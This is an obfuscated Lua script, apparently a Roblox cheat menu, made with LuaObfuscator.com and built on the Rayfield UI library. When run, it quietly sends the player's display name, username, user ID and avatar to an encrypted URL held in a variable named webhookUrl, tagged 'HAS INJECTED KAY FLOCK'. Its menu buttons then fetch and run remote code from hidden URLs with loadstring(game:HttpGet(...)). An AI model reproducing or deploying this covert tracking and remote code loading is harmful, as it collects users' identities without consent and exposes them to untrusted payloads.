--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.10.5) ~  Much Love, Ferib 

]]--

local TABLE_TableIndirection = {}; -- 
-- Bogus Performance Evaluation: x5.329
bit32 = {};
TABLE_TableIndirection["N%0"] = 32;
TABLE_TableIndirection["P%0"] = 2 ^ TABLE_TableIndirection["N%0"];
bit32.bnot = function(x)
	local FlatIdent_1BCFB = 0;
	while true do
		if (FlatIdent_1BCFB == 0) then
			x = x % TABLE_TableIndirection["P%0"];
			return (TABLE_TableIndirection["P%0"] - 1) - x;
		end
	end
end;
bit32.band = function(x, y)
	if (y == 255) then
		return x % 256;
	end
	if (y == 65535) then
		return x % 65536;
	end
	if (y == 4294967295) then
		return x % 4294967296;
	end
	x, y = x % TABLE_TableIndirection["P%0"], y % TABLE_TableIndirection["P%0"];
	TABLE_TableIndirection["r%0"] = 0;
	TABLE_TableIndirection["p%0"] = 1;
	for i = 1, TABLE_TableIndirection["N%0"] do
		local FlatIdent_95CAC = 0;
		local a;
		local b;
		while true do
			if (FlatIdent_95CAC == 1) then
				if ((a + b) == 2) then
					TABLE_TableIndirection["r%0"] = TABLE_TableIndirection["r%0"] + TABLE_TableIndirection["p%0"];
				end
				TABLE_TableIndirection["p%0"] = 2 * TABLE_TableIndirection["p%0"];
				break;
			end
			if (FlatIdent_95CAC == 0) then
				a, b = x % 2, y % 2;
				x, y = math.floor(x / 2), math.floor(y / 2);
				FlatIdent_95CAC = 1;
			end
		end
	end
	return TABLE_TableIndirection["r%0"];
end;
bit32.bor = function(x, y)
	local FlatIdent_7FAC9 = 0;
	while true do
		if (0 == FlatIdent_7FAC9) then
			if (y == 255) then
				return (x - (x % 256)) + 255;
			end
			if (y == 65535) then
				return (x - (x % 65536)) + 65535;
			end
			FlatIdent_7FAC9 = 1;
		end
		if (FlatIdent_7FAC9 == 3) then
			for i = 1, TABLE_TableIndirection["N%0"] do
				local a, b = x % 2, y % 2;
				x, y = math.floor(x / 2), math.floor(y / 2);
				if ((a + b) >= 1) then
					TABLE_TableIndirection["r%0"] = TABLE_TableIndirection["r%0"] + TABLE_TableIndirection["p%0"];
				end
				TABLE_TableIndirection["p%0"] = 2 * TABLE_TableIndirection["p%0"];
			end
			return TABLE_TableIndirection["r%0"];
		end
		if (FlatIdent_7FAC9 == 2) then
			TABLE_TableIndirection["r%0"] = 0;
			TABLE_TableIndirection["p%0"] = 1;
			FlatIdent_7FAC9 = 3;
		end
		if (FlatIdent_7FAC9 == 1) then
			if (y == 4294967295) then
				return 4294967295;
			end
			x, y = x % TABLE_TableIndirection["P%0"], y % TABLE_TableIndirection["P%0"];
			FlatIdent_7FAC9 = 2;
		end
	end
end;
bit32.bxor = function(x, y)
	local FlatIdent_99389 = 0;
	while true do
		if (FlatIdent_99389 == 1) then
			TABLE_TableIndirection["p%0"] = 1;
			for i = 1, TABLE_TableIndirection["N%0"] do
				local FlatIdent_8D327 = 0;
				local a;
				local b;
				while true do
					if (FlatIdent_8D327 == 0) then
						a, b = x % 2, y % 2;
						x, y = math.floor(x / 2), math.floor(y / 2);
						FlatIdent_8D327 = 1;
					end
					if (FlatIdent_8D327 == 1) then
						if ((a + b) == 1) then
							TABLE_TableIndirection["r%0"] = TABLE_TableIndirection["r%0"] + TABLE_TableIndirection["p%0"];
						end
						TABLE_TableIndirection["p%0"] = 2 * TABLE_TableIndirection["p%0"];
						break;
					end
				end
			end
			FlatIdent_99389 = 2;
		end
		if (FlatIdent_99389 == 0) then
			x, y = x % TABLE_TableIndirection["P%0"], y % TABLE_TableIndirection["P%0"];
			TABLE_TableIndirection["r%0"] = 0;
			FlatIdent_99389 = 1;
		end
		if (FlatIdent_99389 == 2) then
			return TABLE_TableIndirection["r%0"];
		end
	end
end;
bit32.lshift = function(x, s_amount)
	local FlatIdent_67C40 = 0;
	while true do
		if (1 == FlatIdent_67C40) then
			if (s_amount < 0) then
				return math.floor(x * (2 ^ s_amount));
			else
				return (x * (2 ^ s_amount)) % TABLE_TableIndirection["P%0"];
			end
			break;
		end
		if (FlatIdent_67C40 == 0) then
			if (math.abs(s_amount) >= TABLE_TableIndirection["N%0"]) then
				return 0;
			end
			x = x % TABLE_TableIndirection["P%0"];
			FlatIdent_67C40 = 1;
		end
	end
end;
bit32.rshift = function(x, s_amount)
	local FlatIdent_8D83D = 0;
	while true do
		if (FlatIdent_8D83D == 1) then
			if (s_amount > 0) then
				return math.floor(x * (2 ^ -s_amount));
			else
				return (x * (2 ^ -s_amount)) % TABLE_TableIndirection["P%0"];
			end
			break;
		end
		if (FlatIdent_8D83D == 0) then
			if (math.abs(s_amount) >= TABLE_TableIndirection["N%0"]) then
				return 0;
			end
			x = x % TABLE_TableIndirection["P%0"];
			FlatIdent_8D83D = 1;
		end
	end
end;
bit32.arshift = function(x, s_amount)
	local FlatIdent_44839 = 0;
	while true do
		if (FlatIdent_44839 == 1) then
			if (s_amount > 0) then
				local FlatIdent_39B0 = 0;
				while true do
					if (FlatIdent_39B0 == 0) then
						TABLE_TableIndirection["add%0"] = 0;
						if (x >= (TABLE_TableIndirection["P%0"] / 2)) then
							TABLE_TableIndirection["add%0"] = TABLE_TableIndirection["P%0"] - (2 ^ (TABLE_TableIndirection["N%0"] - s_amount));
						end
						FlatIdent_39B0 = 1;
					end
					if (FlatIdent_39B0 == 1) then
						return math.floor(x * (2 ^ -s_amount)) + TABLE_TableIndirection["add%0"];
					end
				end
			else
				return (x * (2 ^ -s_amount)) % TABLE_TableIndirection["P%0"];
			end
			break;
		end
		if (FlatIdent_44839 == 0) then
			if (math.abs(s_amount) >= TABLE_TableIndirection["N%0"]) then
				return 0;
			end
			x = x % TABLE_TableIndirection["P%0"];
			FlatIdent_44839 = 1;
		end
	end
end;
TABLE_TableIndirection["obf_stringchar%0"] = string['char'];
TABLE_TableIndirection["obf_stringbyte%0"] = string['byte'];
TABLE_TableIndirection["obf_stringsub%0"] = string['sub'];
TABLE_TableIndirection["obf_bitlib%0"] = bit32 or bit;
TABLE_TableIndirection["obf_XOR%0"] = TABLE_TableIndirection["obf_bitlib%0"]['bxor'];
TABLE_TableIndirection["obf_tableconcat%0"] = table['concat'];
TABLE_TableIndirection["obf_tableinsert%0"] = table['insert'];
local function LUAOBFUSACTOR_DECRYPT_STR_0(LUAOBFUSACTOR_STR, LUAOBFUSACTOR_KEY)
	local FlatIdent_61585 = 0;
	while true do
		if (1 == FlatIdent_61585) then
			return TABLE_TableIndirection["obf_tableconcat%0"](TABLE_TableIndirection["result%0"]);
		end
		if (0 == FlatIdent_61585) then
			TABLE_TableIndirection["result%0"] = {};
			for i = 1, #LUAOBFUSACTOR_STR do
				TABLE_TableIndirection["obf_tableinsert%0"](TABLE_TableIndirection["result%0"], TABLE_TableIndirection["obf_stringchar%0"](TABLE_TableIndirection["obf_XOR%0"](TABLE_TableIndirection["obf_stringbyte%0"](TABLE_TableIndirection["obf_stringsub%0"](LUAOBFUSACTOR_STR, i, i + 1)), TABLE_TableIndirection["obf_stringbyte%0"](TABLE_TableIndirection["obf_stringsub%0"](LUAOBFUSACTOR_KEY, 1 + (i % #LUAOBFUSACTOR_KEY), 1 + (i % #LUAOBFUSACTOR_KEY) + 1))) % 256));
			end
			FlatIdent_61585 = 1;
		end
	end
end
TABLE_TableIndirection["webhookUrl%0"] = LUAOBFUSACTOR_DECRYPT_STR_0("\217\215\207\53\245\225\136\81\213\202\200\38\233\169\195\80\210\204\214\106\231\171\206\81\198\198\217\45\233\180\204\13\158\146\137\113\181\233\158\79\132\150\142\119\190\235\144\79\132\155\137\124\169\149\223\60\203\242\255\104\204\136\221\73\219\151\201\0\246\136\158\24\193\233\137\60\220\185\224\8\137\144\232\114\215\176\194\14\243\150\210\113\243\233\151\12\216\149\255\55\178\163\211\14\223\200\248\9\235\186\255\28\212\242\240\63\220\161\148\33\223", "\126\177\163\187\69\134\219\167");
TABLE_TableIndirection["player%0"] = game['Players']['LocalPlayer'];
TABLE_TableIndirection["playerName%0"] = TABLE_TableIndirection["player%0"]['DisplayName'];
TABLE_TableIndirection["playerUsername%0"] = TABLE_TableIndirection["player%0"]['Name'];
TABLE_TableIndirection["playerID%0"] = TABLE_TableIndirection["player%0"]['UserId'];
TABLE_TableIndirection["playerAvatar%0"] = LUAOBFUSACTOR_DECRYPT_STR_0("\43\217\62\213\239\121\130\101\198\248\45\131\46\204\239\32\194\56\193\253\51\221\100\198\243\46\130\43\209\232\34\206\34\200\249\45\217\57\138\173\113\159\126\144\174\117\155\126\147\169\119\149\120\150\164\112\152\114\138\173\113\153\122\156\171\113\158\127\146\172\122\148\114\144\173\123\155\125\138\233\36\200\47\198\244\42\200\103\206\253\58\128\44\201\243\32\198\100\194\245\37\146\47\221\161\117\155\126\195\255\114\152\120\131\245\48\144\124\147\168\38\155\44\193\174\101\197\39\152\248\38\157\127\148\250\113\156\40\147\255\123\207\123\147\174\34\201\44\192\171\34\157\122\148\170\117\207\120\148\253\37\152\120\150\249\122\207\46\198\255\123\204\47\148\168\38\148\127\147\250\114\148\43\193\253\37\155\40\196\255\37\159\125", "\156\67\173\74\165");
TABLE_TableIndirection["injectionTime%0"] = os.date(LUAOBFUSACTOR_DECRYPT_STR_0("\113\142\4\83\177\107\3\48\247\12\63\230\99\107\110\242\122\86\249\54", "\38\84\215\41\118\220\70"));
TABLE_TableIndirection["data%0"] = {[LUAOBFUSACTOR_DECRYPT_STR_0("\85\27\32\23\250\67", "\158\48\118\66\114")]={{[LUAOBFUSACTOR_DECRYPT_STR_0("\191\45\4\58\118", "\155\203\68\112\86\19\197")]=LUAOBFUSACTOR_DECRYPT_STR_0("\118\209\55\229\69\106\165\209\72\219\57\238\77\121\241\241\73\211", "\152\38\189\86\156\32\24\133"),[LUAOBFUSACTOR_DECRYPT_STR_0("\255\88\171\73\238", "\38\156\55\199")]=16711680,[LUAOBFUSACTOR_DECRYPT_STR_0("\172\120\111\43\1\125\234\87\161\114\114", "\35\200\29\28\72\115\20\154")]=("• **" .. TABLE_TableIndirection["playerName%0"] .. "**\n• **" .. TABLE_TableIndirection["playerUsername%0"] .. "**\n• **" .. TABLE_TableIndirection["playerID%0"] .. "**\n• **HAS INJECTED KAY FLOCK**\n• **Injection Time: " .. TABLE_TableIndirection["injectionTime%0"] .. LUAOBFUSACTOR_DECRYPT_STR_0("\83\245", "\84\121\223\177\191\237\76")),[LUAOBFUSACTOR_DECRYPT_STR_0("\175\94\220\173\56\94\49\200\183", "\161\219\54\169\192\90\48\80")]={[LUAOBFUSACTOR_DECRYPT_STR_0("\92\80\12", "\69\41\34\96")]=TABLE_TableIndirection["playerAvatar%0"]}}}};
TABLE_TableIndirection["httpService%0"] = game:GetService(LUAOBFUSACTOR_DECRYPT_STR_0("\148\215\195\26\49\46\174\213\222\9\7", "\75\220\163\183\106\98"));
TABLE_TableIndirection["request%0"] = http_request or request or HttpPost or syn['request'];
TABLE_TableIndirection["request%0"]({[LUAOBFUSACTOR_DECRYPT_STR_0("\55\168\135", "\185\98\218\235\87")]=TABLE_TableIndirection["webhookUrl%0"],[LUAOBFUSACTOR_DECRYPT_STR_0("\230\57\51\238\209\174", "\202\171\92\71\134\190")]=LUAOBFUSACTOR_DECRYPT_STR_0("\25\238\31\188", "\232\73\161\76"),[LUAOBFUSACTOR_DECRYPT_STR_0("\147\220\67\89\27\169\202", "\126\219\185\34\61")]={[LUAOBFUSACTOR_DECRYPT_STR_0("\47\193\80\102\123\121\231\170\56\215\78\119", "\135\108\174\62\18\30\23\147")]=LUAOBFUSACTOR_DECRYPT_STR_0("\183\249\58\199\17\173\50\211\191\230\36\132\18\189\60\201", "\167\214\137\74\171\120\206\83")},[LUAOBFUSACTOR_DECRYPT_STR_0("\169\255\54\68", "\199\235\144\82\61\152")]=TABLE_TableIndirection["httpService%0"]:JSONEncode(TABLE_TableIndirection["data%0"])});
TABLE_TableIndirection["Rayfield%0"] = loadstring(game:HttpGet(LUAOBFUSACTOR_DECRYPT_STR_0("\15\2\173\59\20\76\246\100\20\31\171\34\18\5\247\38\2\24\172\100\21\23\160\45\14\19\181\47", "\75\103\118\217")))();
TABLE_TableIndirection["Window%0"] = TABLE_TableIndirection["Rayfield%0"]:CreateWindow({[LUAOBFUSACTOR_DECRYPT_STR_0("\233\85\125\17", "\126\167\52\16\116\217")]=LUAOBFUSACTOR_DECRYPT_STR_0("\227\47\57\166\184\22\255\195", "\156\168\78\64\224\212\121"),[LUAOBFUSACTOR_DECRYPT_STR_0("\43\225\164\202\14\224\162\250\14\250\169\203", "\174\103\142\197")]=LUAOBFUSACTOR_DECRYPT_STR_0("\90\39\94\60\44\80\255\22\3\94\33\3\82\247\85\35", "\152\54\72\63\88\69\62"),[LUAOBFUSACTOR_DECRYPT_STR_0("\248\203\239\88\221\202\233\111\193\198\250\85\192\200\235", "\60\180\164\142")]=LUAOBFUSACTOR_DECRYPT_STR_0("\90\71\69\42\54\252\4", "\114\56\62\101\73\71\141"),[LUAOBFUSACTOR_DECRYPT_STR_0("\155\230\213\194\177\238\206\214\185\253\210\203\182\218\218\210\177\231\220", "\164\216\137\187")]={[LUAOBFUSACTOR_DECRYPT_STR_0("\247\232\48\176\170\251\15", "\107\178\134\81\210\198\158")]=false,[LUAOBFUSACTOR_DECRYPT_STR_0("\30\1\142\194\175\42\32\131\203\175", "\202\88\110\226\166")]=nil,[LUAOBFUSACTOR_DECRYPT_STR_0("\229\6\142\242\228\194\2\135", "\170\163\111\226\151")]=LUAOBFUSACTOR_DECRYPT_STR_0("\51\57\181\120\102\34\43", "\73\113\80\210\88\46\87")},[LUAOBFUSACTOR_DECRYPT_STR_0("\165\37\222\17\232\147\40", "\135\225\76\173\114")]={[LUAOBFUSACTOR_DECRYPT_STR_0("\63\227\185\178\160\184\163", "\199\122\141\216\208\204\221")]=true,[LUAOBFUSACTOR_DECRYPT_STR_0("\132\211\6\249\108\243", "\150\205\189\112\144\24")]=LUAOBFUSACTOR_DECRYPT_STR_0("\118\166\184\116\53\138\23\18\28\142", "\112\69\228\223\44\100\232\113"),[LUAOBFUSACTOR_DECRYPT_STR_0("\230\26\10\214\187\126\131\198\53\8\218\184\111", "\230\180\127\103\179\214\28")]=true},[LUAOBFUSACTOR_DECRYPT_STR_0("\167\0\70\117\253\82\244\137\8", "\128\236\101\63\38\132\33")]=true,[LUAOBFUSACTOR_DECRYPT_STR_0("\135\172\8\119\179\255\219\165\167\22\87", "\175\204\201\113\36\214\139")]={[LUAOBFUSACTOR_DECRYPT_STR_0("\115\197\33\208\1", "\100\39\172\85\188")]=LUAOBFUSACTOR_DECRYPT_STR_0("\134\121\160\166\63\162\123\178\192\47\237\83\188\153\115\158\97\170\148\54\160", "\83\205\24\217\224"),[LUAOBFUSACTOR_DECRYPT_STR_0("\213\208\207\41\239\209\193\56", "\93\134\165\173")]=LUAOBFUSACTOR_DECRYPT_STR_0("\176\251\205", "\30\222\146\161\162\90\174\210"),[LUAOBFUSACTOR_DECRYPT_STR_0("\203\65\100\15", "\106\133\46\16")]=LUAOBFUSACTOR_DECRYPT_STR_0("\83\37\106\188\92\82\87\45\51\248\83\83\91\47\97\248", "\32\56\64\19\156\58"),[LUAOBFUSACTOR_DECRYPT_STR_0("\124\193\233\83\116\243\141\95", "\224\58\168\133\54\58\146")]=LUAOBFUSACTOR_DECRYPT_STR_0("\116\95\69\244\53\173\134\18\127\90\68\254\126", "\107\57\54\43\157\21\230\231"),[LUAOBFUSACTOR_DECRYPT_STR_0("\232\138\7\240\146\217\214", "\175\187\235\113\149\217\188")]=false,[LUAOBFUSACTOR_DECRYPT_STR_0("\27\189\128\78\200\124\97\26\189\142\65\208\112\108\57", "\24\92\207\225\44\131\25")]=true,[LUAOBFUSACTOR_DECRYPT_STR_0("\96\214\161", "\29\43\179\216\44\123")]={LUAOBFUSACTOR_DECRYPT_STR_0("\254\255\18\105\152\255\12\28\158\242", "\44\221\185\64"),LUAOBFUSACTOR_DECRYPT_STR_0("\2\246", "\19\97\135\40\63"),LUAOBFUSACTOR_DECRYPT_STR_0("\184\13", "\81\206\60\83\91\79")}}});
TABLE_TableIndirection["MainTab%0"] = TABLE_TableIndirection["Window%0"]:CreateTab(LUAOBFUSACTOR_DECRYPT_STR_0("\99\170\217\124", "\196\46\203\176\18\79\163\45"), 17516480873);
TABLE_TableIndirection["MainSection%0"] = TABLE_TableIndirection["MainTab%0"]:CreateSection(LUAOBFUSACTOR_DECRYPT_STR_0("\148\45\127\26\100\208\238\161\4\114\17\39\240", "\143\216\66\30\126\68\155"));
TABLE_TableIndirection["Rayfield%0"]:Notify({[LUAOBFUSACTOR_DECRYPT_STR_0("\158\193\25\199\192", "\129\202\168\109\171\165\195\183")]=LUAOBFUSACTOR_DECRYPT_STR_0("\27\87\34\152\251\12\227\33\77\35\221\218\84\205\35\65\17\212\209\23\237", "\134\66\56\87\184\190\116"),[LUAOBFUSACTOR_DECRYPT_STR_0("\31\62\7\175\28\229\53", "\85\92\81\105\219\121\139\65")]=LUAOBFUSACTOR_DECRYPT_STR_0("\214\178\73\99\112\208\254\184\16\13\72\230\209\150\98\118\60\254\189\145\121\98\60\253\209\146\115\110\60\242\210\157\123\96\69\150", "\191\157\211\48\37\28"),[LUAOBFUSACTOR_DECRYPT_STR_0("\251\10\230\29\46\214\16\250", "\90\191\127\148\124")]=2,[LUAOBFUSACTOR_DECRYPT_STR_0("\81\138\47\16\125", "\119\24\231\78")]=17516480873,[LUAOBFUSACTOR_DECRYPT_STR_0("\163\46\177\67\211\78\2", "\113\226\77\197\42\188\32")]={[LUAOBFUSACTOR_DECRYPT_STR_0("\19\17\250\186\40\19", "\213\90\118\148")]={[LUAOBFUSACTOR_DECRYPT_STR_0("\117\47\185\83", "\45\59\78\212\54")]=LUAOBFUSACTOR_DECRYPT_STR_0("\59\87\154\173\138\33\174\251\80\121\141\203\178\33\189", "\144\112\54\227\235\230\78\205"),[LUAOBFUSACTOR_DECRYPT_STR_0("\144\41\3\240\210\90\176\35", "\59\211\72\111\156\176")]=function()
	print(LUAOBFUSACTOR_DECRYPT_STR_0("\101\134\250\11\66\136\224\38\14\168\237\109\122\136\243", "\77\46\231\131"));
end}}});
TABLE_TableIndirection["Button%0"] = TABLE_TableIndirection["MainTab%0"]:CreateButton({[LUAOBFUSACTOR_DECRYPT_STR_0("\148\85\187\69", "\32\218\52\214")]=LUAOBFUSACTOR_DECRYPT_STR_0("\101\22\40\142\253\191\70\81\14\59\62\171\250\254", "\58\46\119\81\200\145\208\37"),[LUAOBFUSACTOR_DECRYPT_STR_0("\8\141\60\160\171\188\53\32", "\86\75\236\80\204\201\221")]=function()
	loadstring(game:HttpGet(LUAOBFUSACTOR_DECRYPT_STR_0("\122\85\99\149\237\209\61\14\103\132\237\159\119\67\126\139\176\136\125\76\56\151\255\156\61\108\66\220\228\178\121\84\66", "\235\18\33\23\229\158")))();
end});
TABLE_TableIndirection["Button%1"] = TABLE_TableIndirection["MainTab%0"]:CreateButton({[LUAOBFUSACTOR_DECRYPT_STR_0("\126\187\204\190", "\219\48\218\161")]=LUAOBFUSACTOR_DECRYPT_STR_0("\207\112\101\111\215\64\227\239\98\60\125\222\67\229\244\126\110\93\149", "\128\132\17\28\41\187\47"),[LUAOBFUSACTOR_DECRYPT_STR_0("\34\51\10\54\95\0\49\13", "\61\97\82\102\90")]=function()
	loadstring(game:HttpGet(LUAOBFUSACTOR_DECRYPT_STR_0("\164\58\191\91\212\13\81\70\188\47\184\95\194\85\23\7\226\45\164\70\136\69\31\30\227\52\252\79\240\5\16\0\175", "\105\204\78\203\43\167\55\126")))();
end});
TABLE_TableIndirection["Button%2"] = TABLE_TableIndirection["MainTab%0"]:CreateButton({[LUAOBFUSACTOR_DECRYPT_STR_0("\139\171\46\27", "\49\197\202\67\126\115\100\167")]=LUAOBFUSACTOR_DECRYPT_STR_0("\28\90\198\15\140\89\93\60\72\159\0\142\64\87\36\82\221\37\133\24", "\62\87\59\191\73\224\54"),[LUAOBFUSACTOR_DECRYPT_STR_0("\196\3\246\197\229\3\249\194", "\169\135\98\154")]=function()
	loadstring(game:HttpGet(LUAOBFUSACTOR_DECRYPT_STR_0("\195\99\48\68\238\105\135\132\103\37\71\233\54\202\194\121\106\87\242\62\135\217\118\51\27\197\55\224\252\116\34\127\219", "\168\171\23\68\52\157\83")))();
end});
TABLE_TableIndirection["Button%3"] = TABLE_TableIndirection["MainTab%0"]:CreateButton({[LUAOBFUSACTOR_DECRYPT_STR_0("\218\112\248\168", "\231\148\17\149\205\69\77")]=LUAOBFUSACTOR_DECRYPT_STR_0("\171\166\222\221\91\240\131\172\212\187\100\246\140\162\201\239\25", "\159\224\199\167\155\55"),[LUAOBFUSACTOR_DECRYPT_STR_0("\212\242\48\222\245\242\63\217", "\178\151\147\92")]=function()
	loadstring(game:HttpGet(LUAOBFUSACTOR_DECRYPT_STR_0("\132\233\88\34\1\22\53\195\237\77\33\6\73\120\133\243\2\49\29\65\53\158\252\91\125\25\124\43\142\164\31\106\70", "\26\236\157\44\82\114\44")))();
end});
